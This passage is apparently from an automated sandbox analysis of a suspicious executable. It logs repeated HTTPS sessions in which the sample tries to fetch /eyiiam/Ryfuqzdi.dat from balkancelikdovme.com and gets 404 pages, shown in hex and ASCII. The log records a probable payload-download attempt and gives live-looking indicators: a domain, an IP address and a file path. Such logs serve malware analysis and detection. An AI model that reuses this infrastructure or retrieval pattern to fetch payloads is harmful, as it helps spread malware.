      2025-01-10 22:05:15 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      29192.168.2.449765185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:15 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:16 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:16 GMT
      vary: User-Agent
      2025-01-10 22:05:16 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      30192.168.2.449766185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:16 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:17 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:16 GMT
      vary: User-Agent
      2025-01-10 22:05:17 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      31192.168.2.449767185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:17 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:17 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:17 GMT
      vary: User-Agent
      2025-01-10 22:05:17 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      32192.168.2.449768185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:18 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:18 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:18 GMT
      vary: User-Agent
      2025-01-10 22:05:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      33192.168.2.449769185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:19 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:19 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:19 GMT
      vary: User-Agent
      2025-01-10 22:05:19 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      34192.168.2.449770185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:20 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:20 GMT
      vary: User-Agent
      2025-01-10 22:05:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      35192.168.2.449771185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:21 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:21 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:21 GMT
      vary: User-Agent
      2025-01-10 22:05:21 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      36192.168.2.449772185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:22 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:22 GMT
      vary: User-Agent
      2025-01-10 22:05:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      37192.168.2.449773185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:23 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:23 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:23 GMT
      vary: User-Agent
      2025-01-10 22:05:23 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      38192.168.2.449774185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:23 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:24 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:24 GMT
      vary: User-Agent
      2025-01-10 22:05:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      39192.168.2.449775185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:24 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:25 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:24 GMT
      vary: User-Agent
      2025-01-10 22:05:25 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      40192.168.2.449776185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:25 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:25 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:25 GMT
      vary: User-Agent
      2025-01-10 22:05:25 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      41192.168.2.449777185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:26 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:26 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:26 GMT
      vary: User-Agent
      2025-01-10 22:05:26 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      42192.168.2.449778185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:27 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:27 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:27 GMT
      vary: User-Agent
